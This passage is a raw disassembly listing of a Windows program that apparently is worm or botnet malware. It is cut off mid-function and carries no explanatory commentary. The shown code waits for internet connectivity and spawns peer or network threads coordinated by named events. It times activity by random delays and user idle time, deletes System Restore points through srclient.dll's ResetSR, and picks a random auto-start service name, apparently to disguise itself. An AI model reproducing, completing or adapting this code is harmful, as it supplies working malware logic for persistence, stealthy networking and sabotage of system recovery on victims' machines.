push offset Addend ; lpAddend
call InterlockedIncrement
cmp dword_9BB2B0, eax
jb loc_9ADA20
and [ebp+ms_exc.disabled], 0
call sub_9AC50B
mov ebx, 102h
mov edi, WaitForSingleObject
loc_9AD8F9: ; CODE XREF: sub_9AD8BC+14A�j
mov eax, [esi+8]
mov [ebp+netlong], eax
push dword ptr [esi+10h]
push dword ptr [esi+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9AA646
add esp, 10h
test eax, eax
jz loc_9AD9C6
and [ebp+var_1C], 0
loc_9AD921: ; CODE XREF: sub_9AD8BC+E9�j
; sub_9AD8BC+FC�j
push 0 ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz loc_9AD9BD
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb loc_9AD9BD
loc_9AD93B: ; CODE XREF: sub_9AD8BC+D9�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9AD997
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb short loc_9AD997
push [ebp+netlong] ; netlong
call ntohl
inc eax
push eax ; netlong
call ntohl_0
mov [ebp+netlong], eax
cmp eax, [esi+4]
jz short loc_9AD992
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; netlong
call sub_9AABAE
add esp, 0Ch
cmp dword ptr [esi+14h], 0
mov eax, dwMilliseconds
jnz short loc_9AD989
mov eax, dword_9BAAB0
loc_9AD989: ; CODE XREF: sub_9AD8BC+C6�j
push eax ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9AD997
loc_9AD992: ; CODE XREF: sub_9AD8BC+AC�j
inc [ebp+var_1C]
jmp short loc_9AD93B
; ---------------------------------------------------------------------------
loc_9AD997: ; CODE XREF: sub_9AD8BC+8D�j
; sub_9AD8BC+95�j ...
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jnz loc_9AD921
push 3E8h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz short loc_9AD997
jmp loc_9AD921
; ---------------------------------------------------------------------------
loc_9AD9BD: ; CODE XREF: sub_9AD8BC+6D�j
; sub_9AD8BC+79�j
push [ebp+Src] ; hMem
call GlobalFree
loc_9AD9C6: ; CODE XREF: sub_9AD8BC+5B�j
cmp dword ptr [esi+14h], 0
jz short loc_9AD9D7
push offset dword_9BB2C0 ; lpAddend
call InterlockedDecrement
loc_9AD9D7: ; CODE XREF: sub_9AD8BC+10E�j
push 36EE80h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9ADA0C
cmp dword ptr [esi+14h], 0
jnz short loc_9ADA0C
call rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 3Ch
imul edx, 0EA60h
push edx ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz loc_9AD8F9
loc_9ADA0C: ; CODE XREF: sub_9AD8BC+126�j
; sub_9AD8BC+12C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9ADA20
; ---------------------------------------------------------------------------
loc_9ADA12: ; DATA XREF: .text:stru_9A44B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ADA16: ; DATA XREF: .text:stru_9A44B0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_9ADA20: ; CODE XREF: sub_9AD8BC+23�j
; sub_9AD8BC+154�j
push offset Addend ; lpAddend
call InterlockedDecrement
push dword ptr [esi] ; hObject
call CloseHandle
push esi ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AD8BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADA44 proc near ; CODE XREF: sub_9AF7D5+3C5�p
Name = byte ptr -2Ch
var_D = byte ptr -0Dh
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_4]
call sub_9AC384
test eax, eax
pop ecx
jnz short loc_9ADA66
mov eax, dword_9BB2B8
mov [ebp+arg_4], eax
mov eax, dword_9BB2BC
jmp short loc_9ADA6B
; ---------------------------------------------------------------------------
loc_9ADA66: ; CODE XREF: sub_9ADA44+11�j
mov eax, dword_9BB2F4
loc_9ADA6B: ; CODE XREF: sub_9ADA44+20�j
push esi
mov esi, [ebp+arg_0]
push esi
mov [ebp+var_8], eax
call sub_9AC3B1
test eax, eax
pop ecx
jz loc_9ADB80
push [ebp+arg_4]
call sub_9AC3B1
test eax, eax
pop ecx
jz loc_9ADB80
push esi
call sub_9AC384
test eax, eax
pop ecx
jz loc_9ADB80
push [ebp+arg_4]
call sub_9AC384
test eax, eax
pop ecx
jz loc_9ADB80
mov al, byte ptr [ebp+arg_0+2]
push ebx
xor ebx, ebx
cmp al, 0Ah
mov [ebp+var_4], esi
jb short loc_9ADACB
sub al, 0Ah
mov esi, 0AF5h
mov byte ptr [ebp+var_4+2], al
jmp short loc_9ADAD8
; ---------------------------------------------------------------------------
loc_9ADACB: ; CODE XREF: sub_9ADA44+79�j
movzx esi, al
inc esi
imul esi, 0FFh
mov byte ptr [ebp+var_4+2], bl
loc_9ADAD8: ; CODE XREF: sub_9ADA44+85�j
push edi
push esi
mov byte ptr [ebp+var_4+3], bl
push [ebp+var_4]
lea eax, [ebp+Name]
push [ebp+arg_4]
push offset aN08x08x08x ; "n%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_D], bl
call CreateEventA
mov edi, eax
cmp edi, ebx
jz short loc_9ADB7E
call GetLastError
cmp eax, 0B7h
jz short loc_9ADB77
push offset dword_9BB2C0 ; lpAddend
call InterlockedIncrement
cmp Target, eax
jl short loc_9ADB6C
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD8BC ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
mov [eax], edi
mov [eax+0Ch], esi
mov dword ptr [eax+14h], 1
call CreateThread
push eax
jmp short loc_9ADB78
; ---------------------------------------------------------------------------
loc_9ADB6C: ; CODE XREF: sub_9ADA44+E8�j
push offset dword_9BB2C0 ; lpAddend
call InterlockedDecrement
loc_9ADB77: ; CODE XREF: sub_9ADA44+D5�j
push edi ; hObject
loc_9ADB78: ; CODE XREF: sub_9ADA44+126�j
call CloseHandle
loc_9ADB7E: ; CODE XREF: sub_9ADA44+C8�j
pop edi
pop ebx
loc_9ADB80: ; CODE XREF: sub_9ADA44+37�j
; sub_9ADA44+48�j ...
pop esi
leave
retn
sub_9ADA44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_9ADB83(LPVOID)
sub_9ADB83 proc near ; DATA XREF: sub_9AE102+15�o
plii = tagLASTINPUTINFO ptr -8
push ecx
push ecx
push ebx
push ebp
push esi
mov esi, InterlockedExchange
push edi
mov ebp, offset dwMilliseconds
mov ebx, offset dword_9BAAB0
loc_9ADB99: ; CODE XREF: sub_9ADB83+6C�j
xor eax, eax
mov [esp+18h+plii.cbSize], 8
lea edi, [esp+18h+plii.dwTime]
stosd
lea eax, [esp+18h+plii]
push eax ; plii
call GetLastInputInfo
test eax, eax
jz short loc_9ADBE4
call GetTickCount
sub eax, [esp+18h+plii.dwTime]
cmp eax, 493E0h
jnb short loc_9ADBD7
push 7D0h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 0C8h
jmp short loc_9ADBE1
; ---------------------------------------------------------------------------
loc_9ADBD7: ; CODE XREF: sub_9ADB83+43�j
push 3E8h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 64h ; Value
loc_9ADBE1: ; CODE XREF: sub_9ADB83+52�j
push ebx ; Target
call esi ; InterlockedExchange
loc_9ADBE4: ; CODE XREF: sub_9ADB83+32�j
push 2710h ; dwMilliseconds
call Sleep
jmp short loc_9ADB99
sub_9ADB83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_9ADBF1(LPVOID)
sub_9ADBF1 proc near ; DATA XREF: sub_9AE102+2D�o
var_1850 = byte ptr -1850h
var_184C = byte ptr -184Ch
in = in_addr ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
ThreadId = dword ptr -50h
var_4C = byte ptr -4Ch
Name = byte ptr -48h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1850h
call __alloca_probe
push ebx
push esi
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+Dst], ebx
lea edi, [ebp+var_1C]
stosd
stosd
mov eax, dword_9BAE64
shr eax, 1
mov dword_9BB2B0, eax
call sub_9AC50B
loc_9ADC1E: ; CODE XREF: sub_9ADBF1+50C�j
mov esi, InternetGetConnectedState
jmp short loc_9ADC31
; ---------------------------------------------------------------------------
loc_9ADC26: ; CODE XREF: sub_9ADBF1+49�j
push 1388h ; dwMilliseconds
call Sleep
loc_9ADC31: ; CODE XREF: sub_9ADBF1+33�j
lea eax, [ebp+var_4]
push ebx
push eax
call esi ; InternetGetConnectedState
test eax, eax
jz short loc_9ADC26
loc_9ADC3C: ; CODE XREF: sub_9ADBF1+6E�j
push 1388h ; dwMilliseconds
call Sleep
lea eax, [ebp+in]
push 100h ; int
push eax ; Dst
call sub_9AC416
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_C], eax
jz short loc_9ADC3C
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9ADE35
loc_9ADC6F: ; CODE XREF: sub_9ADBF1+23E�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call CreateEventA
mov esi, eax
cmp esi, ebx
jz loc_9ADE25
call GetLastError
cmp eax, 0B7h
jz loc_9ADE1E
cmp dword_9BB2B8, ebx
jnz loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_9AC384
test eax, eax
pop ecx
jnz loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un] ; in
lea eax, [ebp+var_10]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
call sub_9AA27B
add esp, 0Ch
test eax, eax
jz loc_9ADDD2
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
lea eax, [eax+eax*2]
cmp ecx, dword ptr [ebp+eax*4+in.S_un]
jnz loc_9ADDD2
push [ebp+var_10]
call sub_9AC3B1
test eax, eax
pop ecx
jz loc_9ADDD2
push [ebp+var_10]
call sub_9AC384
test eax, eax
pop ecx
jz loc_9ADDD2
xor ecx, ecx
lea eax, [ebp+in]
loc_9ADD56: ; CODE XREF: sub_9ADBF1+173�j
mov edx, [eax]
cmp edx, [ebp+var_10]
jz short loc_9ADDD2
inc ecx
add eax, 0Ch
cmp ecx, [ebp+var_C]
jb short loc_9ADD56
push ebx ; in
lea eax, [ebp+var_8]
push eax ; int
xor eax, eax
mov ax, word ptr dword_9BB2F4
mov [ebp+var_8], ebx
push eax ; __int16
call sub_9AA320
add esp, 0Ch
test eax, eax
jz short loc_9ADDD2
cmp word ptr [ebp+var_8], bx
jz short loc_9ADDD2
push [ebp+var_8]
push [ebp+var_10]
call sub_9AFEDD
test eax, eax
pop ecx
pop ecx
jz short loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov [ebp+Dst], ecx
mov ecx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
movzx eax, word ptr [ebp+var_8]
mov dword_9BB2BC, eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], ecx
mov dword_9BB2B8, eax
loc_9ADDD2: ; CODE XREF: sub_9ADBF1+DF�j
; sub_9ADBF1+FA�j ...
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [eax], esi
mov ecx, [ebp+var_4]
lea esi, [ecx+ecx*2]
lea esi, [ebp+esi*4+in]
lea edi, [eax+4]
movsd
movsd
movsd
mov ecx, dword_9BB2F4
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD8BC ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
push 32h ; dwMilliseconds
call Sleep
jmp short loc_9ADE25
; ---------------------------------------------------------------------------
loc_9ADE1E: ; CODE XREF: sub_9ADBF1+D3�j
push esi ; hObject
call CloseHandle
loc_9ADE25: ; CODE XREF: sub_9ADBF1+C2�j
; sub_9ADBF1+22B�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ADC6F
loc_9ADE35: ; CODE XREF: sub_9ADBF1+78�j
cmp dword_9BB2B8, ebx
jnz loc_9ADEF1
call sub_9AA572
mov esi, eax
push esi
call sub_9AC3B1
test eax, eax
pop ecx
jz short loc_9ADE5E
push esi
call sub_9AC384
test eax, eax
pop ecx
jnz short loc_9ADE60
loc_9ADE5E: ; CODE XREF: sub_9ADBF1+260�j
xor esi, esi
loc_9ADE60: ; CODE XREF: sub_9ADBF1+26B�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe short loc_9ADEE5
loc_9ADE6A: ; CODE XREF: sub_9ADBF1+2B9�j
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_9AC384
test eax, eax
pop ecx
jz short loc_9ADEA0
mov eax, [ebp+var_4]
lea ecx, [eax+eax*2]
mov ecx, dword ptr [ebp+ecx*4+in.S_un]
cmp ecx, esi
jz short loc_9ADE93
cmp esi, ebx
jnz short loc_9ADEA3
loc_9ADE93: ; CODE XREF: sub_9ADBF1+29C�j
push ebx
push ecx
call sub_9AFEDD
test eax, eax
pop ecx
pop ecx
jnz short loc_9ADEAE
loc_9ADEA0: ; CODE XREF: sub_9ADBF1+28B�j
mov eax, [ebp+var_4]
loc_9ADEA3: ; CODE XREF: sub_9ADBF1+2A0�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb short loc_9ADE6A
jmp short loc_9ADEE5
; ---------------------------------------------------------------------------
loc_9ADEAE: ; CODE XREF: sub_9ADBF1+2AD�j
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov edx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
mov eax, dword_9BB2F4
mov [ebp+Dst], ecx
mov [ebp+var_1C], edx
mov dword_9BB2BC, eax
mov dword_9BB2B8, ecx
loc_9ADEE5: ; CODE XREF: sub_9ADBF1+277�j
; sub_9ADBF1+2BB�j
cmp dword_9BB2B8, ebx
jz loc_9ADF7F
loc_9ADEF1: ; CODE XREF: sub_9ADBF1+24A�j
push ebx
push dword_9BB2BC
lea eax, [ebp+Name]
push dword_9BB2B8
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call CreateEventA
mov esi, eax
cmp esi, ebx
jz short loc_9ADF7F
call GetLastError
cmp eax, 0B7h
jz short loc_9ADF78
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [eax], esi
mov ecx, dword_9BB2B8
mov [eax+4], ecx
mov ecx, dword_9BB2BC
mov [eax+10h], ecx
lea ecx, [ebp+var_4C]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD831 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
push 32h ; dwMilliseconds
call Sleep
jmp short loc_9ADF7F
; ---------------------------------------------------------------------------
loc_9ADF78: ; CODE XREF: sub_9ADBF1+343�j
push esi ; hObject
call CloseHandle
loc_9ADF7F: ; CODE XREF: sub_9ADBF1+2FA�j
; sub_9ADBF1+336�j ...
mov [ebp+var_14], 1
loc_9ADF86: ; CODE XREF: sub_9ADBF1+506�j
push 4E20h ; dwMilliseconds
call Sleep
lea eax, [ebp+var_1850]
push 100h ; int
push eax ; Dst
call sub_9AC416
cmp eax, [ebp+var_C]
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9ADFAF
mov [ebp+var_14], ebx
loc_9ADFAF: ; CODE XREF: sub_9ADBF1+3B9�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9AE0F4
loc_9ADFBD: ; CODE XREF: sub_9ADBF1+4FD�j
cmp [ebp+var_24], ebx
mov [ebp+var_8], ebx
jbe short loc_9AE006
lea ecx, [eax+eax*2]
shl ecx, 2
mov esi, dword ptr [ebp+ecx+in.S_un]
lea edx, [ebp+var_184C]
loc_9ADFD8: ; CODE XREF: sub_9ADBF1+413�j
cmp [edx-4], esi
jnz short loc_9ADFF8
mov edi, [edx]
cmp edi, [ebp+ecx+var_C4C]
jnz short loc_9ADFF8
mov edi, [edx+4]
cmp edi, [ebp+ecx+var_C48]
jz loc_9AE0E7
loc_9ADFF8: ; CODE XREF: sub_9ADBF1+3EA�j
; sub_9ADBF1+3F5�j
mov edi, [ebp+var_24]
inc [ebp+var_8]
add edx, 0Ch
cmp [ebp+var_8], edi
jb short loc_9ADFD8
loc_9AE006: ; CODE XREF: sub_9ADBF1+3D2�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
mov esi, OpenEventA
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov edi, eax
cmp edi, ebx
jz short loc_9AE05B
push edi ; hEvent
call SetEvent
push edi ; hObject
call CloseHandle
loc_9AE05B: ; CODE XREF: sub_9ADBF1+45A�j
mov eax, [ebp+var_4]
mov edx, [ebp+Dst]
lea ecx, [eax+eax*2]
shl ecx, 2
cmp edx, dword ptr [ebp+ecx+in.S_un]
jnz short loc_9AE0E4
mov edx, [ebp+var_1C]
cmp edx, [ebp+ecx+var_C4C]
jnz short loc_9AE0E4
mov edx, [ebp+var_18]
cmp edx, [ebp+ecx+var_C48]
jnz short loc_9AE0E4
push 0Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
push ebx
push dword_9BB2BC
lea eax, [ebp+Name]
push dword_9BB2B8
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 24h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov esi, eax
cmp esi, ebx
jz short loc_9AE0D5
push esi ; hEvent
call SetEvent
push esi ; hObject
call CloseHandle
loc_9AE0D5: ; CODE XREF: sub_9ADBF1+4D4�j
push ebx ; Value
push offset dword_9BB2B8 ; Target
call InterlockedExchange
mov eax, [ebp+var_4]
loc_9AE0E4: ; CODE XREF: sub_9ADBF1+47D�j
; sub_9ADBF1+489�j ...
mov [ebp+var_14], ebx
loc_9AE0E7: ; CODE XREF: sub_9ADBF1+401�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ADFBD
loc_9AE0F4: ; CODE XREF: sub_9ADBF1+3C6�j
cmp [ebp+var_14], ebx
jnz loc_9ADF86
jmp loc_9ADC1E
sub_9ADBF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE102 proc near ; CODE XREF: StartAddress+1AD�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, CreateThread
push edi
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor ebx, ebx
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9ADB83 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9ADBF1 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_9AE102 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE140 proc near ; CODE XREF: sub_9AE850:loc_9AEA37�p
var_20 = dword ptr -20h
hLibModule = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_9A4650
call __SEH_prolog
push offset LibFileName ; "srclient.dll"
call LoadLibraryA
mov [ebp+hLibModule], eax
and [ebp+ms_exc.disabled], 0
test eax, eax
jz short loc_9AE182
push offset aResetsr ; "ResetSR"
push eax ; hModule
call GetProcAddress
mov [ebp+var_20], eax
test eax, eax
jz short loc_9AE182
push 0
call eax
jmp short loc_9AE182
; ---------------------------------------------------------------------------
loc_9AE17B: ; DATA XREF: .text:stru_9A4650�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE17F: ; DATA XREF: .text:stru_9A4650�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AE182: ; CODE XREF: sub_9AE140+20�j
; sub_9AE140+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hLibModule] ; hLibModule
call FreeLibrary
call __SEH_epilog
retn
sub_9AE140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE195 proc near ; CODE XREF: sub_9AE850+3C�p
Buffer = _QUERY_SERVICE_CONFIGW ptr -2050h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
ResumeHandle = dword ptr -3Ch
var_38 = dword ptr -38h
pcbBytesNeeded = dword ptr -34h
hSCObject = dword ptr -30h
ServicesReturned= dword ptr -2Ch
var_28 = dword ptr -28h
dwBytes = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9A4660
push offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 2038h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_40], ebx
mov [ebp+var_4], ebx
push 20005h ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
call OpenSCManagerW
mov [ebp+hSCObject], eax
cmp eax, ebx
jz loc_9AE36F
mov [ebp+dwBytes], ebx
mov [ebp+ServicesReturned], ebx
mov [ebp+ResumeHandle], ebx
mov [ebp+hMem], ebx
mov esi, GlobalAlloc
loc_9AE1F6: ; CODE XREF: sub_9AE195+B3�j
lea eax, [ebp+ResumeHandle]
push eax ; lpResumeHandle
lea eax, [ebp+ServicesReturned]
push eax ; lpServicesReturned
lea eax, [ebp+dwBytes]
push eax ; pcbBytesNeeded
push [ebp+dwBytes] ; cbBufSize
push [ebp+hMem] ; lpServices
push 3 ; dwServiceState
push 30h ; dwServiceType
push [ebp+hSCObject] ; hSCManager
call EnumServicesStatusW
mov [ebp+var_44], eax
cmp eax, ebx
jnz short loc_9AE24A
call GetLastError
cmp eax, 0EAh
jnz short loc_9AE24A
cmp [ebp+hMem], ebx
jz short loc_9AE237
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE237: ; CODE XREF: sub_9AE195+97�j
push [ebp+dwBytes] ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AE24A
mov [ebp+ResumeHandle], ebx
jmp short loc_9AE1F6
; ---------------------------------------------------------------------------
loc_9AE24A: ; CODE XREF: sub_9AE195+85�j
; sub_9AE195+92�j ...
cmp [ebp+var_44], ebx
jz loc_9AE35D
cmp [ebp+hMem], ebx
jz loc_9AE35D
mov eax, [ebp+ServicesReturned]
shl eax, 2
push eax ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov edi, eax
mov [ebp+var_50], edi
mov [ebp+var_20], ebx
or [ebp+var_38], 0FFFFFFFFh
xor esi, esi
loc_9AE275: ; CODE XREF: sub_9AE195+187�j
mov [ebp+var_28], esi
cmp esi, [ebp+ServicesReturned]
jnb loc_9AE321
push 20005h ; dwDesiredAccess
lea eax, [esi+esi*8]
mov ecx, [ebp+hMem]
push dword ptr [ecx+eax*4] ; lpServiceName
push [ebp+hSCObject] ; hSCManager
call OpenServiceW
mov ebx, eax
mov [ebp+var_48], ebx
test ebx, ebx
jz short loc_9AE319
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpServiceConfig
push ebx ; hService
call QueryServiceConfigW
test eax, eax
jz short loc_9AE312
cmp [ebp+Buffer.dwStartType], 2
jnz short loc_9AE312
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 1 ; dwInfoLevel
push ebx ; hService
call QueryServiceConfig2W
test eax, eax
jz short loc_9AE312
cmp [ebp+pcbBytesNeeded], 0
jz short loc_9AE312
lea eax, [ebp+Buffer]
mov [ebp+var_4C], eax
mov eax, [ebp+Buffer.dwServiceType]
test eax, eax
jz short loc_9AE312
cmp word ptr [eax], 0
jz short loc_9AE312
push eax ; Str
call _wcsdup
pop ecx
mov ecx, [ebp+var_20]
mov [edi+ecx*4], eax
inc [ebp+var_20]
loc_9AE312: ; CODE XREF: sub_9AE195+125�j
; sub_9AE195+12E�j ...
push ebx ; hSCObject
call CloseServiceHandle
loc_9AE319: ; CODE XREF: sub_9AE195+10A�j
inc esi
xor ebx, ebx
jmp loc_9AE275
; ---------------------------------------------------------------------------
loc_9AE321: ; CODE XREF: sub_9AE195+E6�j
cmp [ebp+var_20], ebx
jz short loc_9AE33A
call rand
xor edx, edx
div [ebp+var_20]
mov [ebp+var_38], edx
mov eax, [edi+edx*4]
mov [ebp+var_40], eax
loc_9AE33A: ; CODE XREF: sub_9AE195+18F�j
xor esi, esi
loc_9AE33C: ; CODE XREF: sub_9AE195+1BF�j
mov [ebp+var_28], esi
cmp esi, [ebp+var_20]
jnb short loc_9AE356
cmp [ebp+var_38], esi
jz short loc_9AE353
push dword ptr [edi+esi*4] ; Memory
call free
pop ecx
loc_9AE353: ; CODE XREF: sub_9AE195+1B2�j
inc esi
jmp short loc_9AE33C
; ---------------------------------------------------------------------------
loc_9AE356: ; CODE XREF: sub_9AE195+1AD�j
push edi ; hMem
call GlobalFree
loc_9AE35D: ; CODE XREF: sub_9AE195+B8�j
; sub_9AE195+C1�j
push [ebp+hMem] ; hMem
call GlobalFree
push [ebp+hSCObject] ; hSCObject
call CloseServiceHandle
loc_9AE36F: ; CODE XREF: sub_9AE195+49�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_9AE382
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
loc_9AE382: ; CODE XREF: sub_9AE195+1DE�j
mov eax, [ebp+var_40]
cmp eax, ebx
jnz short loc_9AE395
push offset Str ; Str
call _wcsdup
pop ecx
loc_9AE395: ; CODE XREF: sub_9AE195+1F2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
